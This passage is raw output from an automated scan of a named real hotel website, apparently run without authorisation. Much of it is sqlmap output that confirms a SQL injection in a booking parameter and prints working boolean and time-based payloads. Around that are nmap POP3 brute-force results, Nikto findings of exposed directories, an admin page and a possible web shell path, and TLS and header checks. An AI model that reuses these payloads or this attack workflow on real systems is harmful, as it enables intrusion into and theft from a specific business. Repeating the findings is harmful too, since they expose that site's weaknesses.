- + OSVDB-3268: /images/: Directory indexing found.
- + OSVDB-3268: /style/: Directory indexing found.
- + OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
- + /controlpanel/: Admin login page/section found.
- + Server leaks inodes via ETags, header found with file /cgi-sys/c99.php, fields: 0x54643954 0x875e
- + 8634 requests: 0 error(s) and 25 item(s) reported on remote host
- + End Time: 2015-09-29 13:26:36 (GMT-4) (3707 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.8
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [!] [!] The remote website is up, but does not seem to be running WordPress.
- [ERROR] Website Unreachable: http://www.lasdunashotel.com
- _
- ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150928}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 13:27:16
- do you want to check for the existence of site's sitemap(.xml) [y/N] n
- [13:27:16] [INFO] starting crawler
- [13:27:16] [INFO] searching for links with depth 1
- [13:27:28] [INFO] searching for links with depth 2
- please enter number of threads? [Enter for 1 (current)] 1
- [13:27:28] [WARNING] running in a single-thread mode. This could take a while
- [13:27:33] [INFO] 5/17 links visited (29%)
- sqlmap got a 301 redirect to 'http://www.lasdunashotel.com/en/'. Do you want to follow? [Y/n] Y
- [13:27:46] [INFO] searching for links with depth 3
- please enter number of threads? [Enter for 1 (current)] 1
- [13:27:46] [WARNING] running in a single-thread mode. This could take a while
- [13:29:07] [INFO] searching for links with depth 4
- please enter number of threads? [Enter for 1 (current)] 1
- [13:29:07] [WARNING] running in a single-thread mode. This could take a while
- [13:31:47] [INFO] searching for links with depth 5
- please enter number of threads? [Enter for 1 (current)] 1
- [13:31:47] [WARNING] running in a single-thread mode. This could take a while
- do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
- [13:33:06] [INFO] sqlmap got a total of 181 targets
- URL 1:
- GET http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion=
- do you want to test this URL? [Y/n/q]
- > Y
- [13:33:06] [INFO] testing URL 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion='
- [13:33:06] [INFO] using '/root/.sqlmap/output/results-09292015_0133pm.csv' as the CSV results file in multiple targets mode
- [13:33:07] [INFO] testing connection to the target URL
- [13:33:10] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
- do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] N
- [13:33:10] [INFO] testing if the target URL is stable
- [13:33:10] [INFO] target URL is stable
- [13:33:10] [INFO] testing if GET parameter 'pk_paquete_especial' is dynamic
- [13:33:11] [WARNING] GET parameter 'pk_paquete_especial' does not appear dynamic
- [13:33:13] [INFO] heuristics detected web page charset 'ascii'
- [13:33:13] [INFO] heuristic (basic) test shows that GET parameter 'pk_paquete_especial' might be injectable (possible DBMS: 'MySQL')
- [13:33:13] [INFO] heuristic (XSS) test shows that GET parameter 'pk_paquete_especial' might be vulnerable to XSS attacks
- [13:33:13] [INFO] testing for SQL injection on GET parameter 'pk_paquete_especial'
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
- [13:33:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [13:33:23] [WARNING] reflective value(s) found and filtering out
- [13:33:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [13:34:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [13:35:22] [INFO] GET parameter 'pk_paquete_especial' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
- [13:35:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [13:35:23] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [13:35:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [13:35:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [13:35:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
- [13:35:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
- [13:35:25] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:41] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
- [13:35:41] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
- [13:35:41] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
- [13:35:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
- [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [13:35:42] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
- [13:35:42] [INFO] testing 'MySQL inline queries'
- [13:35:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
- [13:35:42] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
- [13:35:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
- [13:35:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [13:35:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [13:35:46] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
- [13:35:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [13:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
- [13:35:48] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
- [13:35:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
- [13:35:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
- [13:36:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
- [13:36:23] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
- [13:36:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
- [13:36:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
- [13:37:28] [INFO] GET parameter 'pk_paquete_especial' seems to be 'MySQL >= 5.0.12 OR time-based blind (comment)' injectable
- [13:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [13:37:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [13:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [13:37:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [13:38:18] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
- [13:38:30] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
- [13:38:44] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
- [13:38:53] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
- [13:39:14] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
- [13:39:27] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
- [13:39:52] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
- [13:39:59] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
- [13:40:09] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
- [13:40:09] [INFO] checking if the injection point on GET parameter 'pk_paquete_especial' is a false positive
- GET parameter 'pk_paquete_especial' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
- sqlmap identified the following injection point(s) with a total of 351 HTTP(s) requests:
- ---
- Parameter: pk_paquete_especial (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: pk_paquete_especial=-3704' OR 4770=4770#&pk_habitacion=
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (comment)
- Payload: pk_paquete_especial=73' OR SLEEP(5)#&pk_habitacion=
- ---
- do you want to exploit this SQL injection? [Y/n] Y
- [13:40:18] [INFO] testing MySQL
- [13:40:20] [INFO] confirming MySQL
- [13:40:22] [INFO] the back-end DBMS is MySQL
- [13:40:22] [INFO] actively fingerprinting MySQL
- [13:40:23] [INFO] executing MySQL comment injection fingerprint
- web application technology: Nginx
- back-end DBMS: active fingerprint: MySQL >= 5.5.0
- html error message fingerprint: MySQL
- [13:40:55] [WARNING] HTTP error codes detected during run:
- 406 (Not Acceptable) - 214 times
- SQL injection vulnerability has already been detected against 'www.lasdunashotel.com'. Do you want to skip further tests involving it? [Y/n] Y
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Sol de Ica'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente Ay B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente A'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Pozo santo'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Dunas'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Sol de Ica'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente Ay B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente A'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Pozo santo'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Dunas'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=35&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=36&pk_habitacion=2'
- [13:40:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09292015_0133pm.csv'
- [*] shutting down at 13:40:55
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:40 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.00095s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 364 guesses in 617 seconds, average tps: 0
- |_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER CAPA STLS SASL(PLAIN LOGIN) RESP-CODES UIDL TOP
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 619.27 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:51 EDT
- NSE: got no answers from pipelined queries
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.022s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- |_http-feed: Couldn't find any feeds.
- |_http-frontpage-login: false
- | http-headers:
- | Date: Tue, 29 Sep 2015 17:51:34 GMT
- | Server: Apache
- | Last-Modified: Sun, 20 Oct 2013 22:07:41 GMT
- | Accept-Ranges: bytes
- | Content-Length: 11812
- | Connection: close
- | Content-Type: text/html
- |
- |_ (Request type: HEAD)
- |_http-iis-webdav-vuln: ERROR: This web server is not supported.
- | http-referer-checker:
- | Spidering limited to: maxpagecount=30
- |_ http://code.jquery.com/jquery-1.9.1.js
- |_http-server-header: Apache
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- | http-useragent-tester:
- |
- | Allowed User Agents:
- | Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)
- | libwww
- | lwp-trivial
- | libcurl-agent/1.0
- | PHP/
- | Python-urllib/2.5
- | GT::WWW
- | Snoopy
- | MFC_Tear_Sample
- | HTTP::Lite
- | PHPCrawl
- | URI::Fetch
- | Zend_Http_Client
- | http client
- | PECL::HTTP
- | Wget/1.13.4 (linux-gnu)
- | WWW-Mechanize/1.34
- |_
- |_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2015-01-05T00:00:00
- | Not valid after: 2018-01-04T23:59:59
- | MD5: fff8 be59 dc8b d8fa b80b 075b a184 4491
- |_SHA-1: 05da b11f 290a 8e49 9c32 44dc d0b4 b334 e2b4 00f6
- |_ssl-date: 2015-09-29T17:51:29+00:00; -3s from scanner time.
- | ssl-enum-ciphers:
- | TLSv1.1:
- | ciphers:
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
- | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
- | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
- | TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
- | compressors:
- | NULL
- | cipher preference: server
- | warnings:
- | Key exchange parameters of lower strength than certificate key
- | Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
- | TLSv1.2:
- | ciphers:
- | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 128) - B
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 128) - B
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
- | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
- | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A
- | TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 128) - C
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 128) - C
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
- | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
- | TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
- | compressors:
- | NULL
- | cipher preference: server
- | warnings:
- | Key exchange parameters of lower strength than certificate key
- | Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
- |_ least strength: C
- | ssl-google-cert-catalog:
- |_ No DB entry
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 2059.30 seconds
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.lasdunashotel.com
- Traceback (most recent call last):
- File "/usr/bin/wafw00f", line 695, in <module>
- main()
- File "/usr/bin/wafw00f", line 665, in main
- if attacker.normalrequest() is None:
- File "/usr/bin/wafw00f", line 90, in normalrequest
- return self.request(usecache=usecache,cacheresponse=cacheresponse,headers=headers)
- File "/usr/share/waffit/libs/evillib.py", line 294, in request
- h.request(method,path,headers=headers)
- File "/usr/lib/python2.7/httplib.py", line 1001, in request
- self._send_request(method, url, body, headers)
- File "/usr/lib/python2.7/httplib.py", line 1035, in _send_request
- self.endheaders(body)
- File "/usr/lib/python2.7/httplib.py", line 997, in endheaders
- self._send_output(message_body)
- File "/usr/lib/python2.7/httplib.py", line 850, in _send_output
- self.send(msg)
- File "/usr/lib/python2.7/httplib.py", line 812, in send
- self.connect()
- File "/usr/lib/python2.7/httplib.py", line 1212, in connect
- server_hostname=server_hostname)
- File "/usr/lib/python2.7/ssl.py", line 350, in wrap_socket
- _context=self)
- File "/usr/lib/python2.7/ssl.py", line 566, in __init__
- self.do_handshake()
- File "/usr/lib/python2.7/ssl.py", line 796, in do_handshake
- match_hostname(self.getpeercert(), self.server_hostname)
- File "/usr/lib/python2.7/ssl.py", line 269, in match_hostname
- % (hostname, ', '.join(map(repr, dnsnames))))
- ssl.CertificateError: hostname 'www.lasdunashotel.com' doesn't match either of '*.websitewelcome.com', 'websitewelcome.com'
- https://www.lasdunashotel.com [302] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], RedirectLocation[/404.html]
- https://www.lasdunashotel.com/404.html [200] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], JQuery[1.9.1], Script[text/javascript], Title[404 - PAGE NOT FOUND]
- + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
- + -- --=[Checking HTTP methods on www.lasdunashotel.com...
- + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
- + -- --=[Checking for open proxy on www.lasdunashotel.com...
- + -- --=[Enumerating software on www.lasdunashotel.com...
- Server: Apache
- + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
- + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
- + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
- + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
- + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
- + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
- + -- --=[Checking cookie attributes on www.lasdunashotel.com...
- Version: 1.10.5-static
- OpenSSL 1.0.2e-dev xx XXX xxxx
- Testing SSL server www.lasdunashotel.com on port 443
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.0 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.2 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
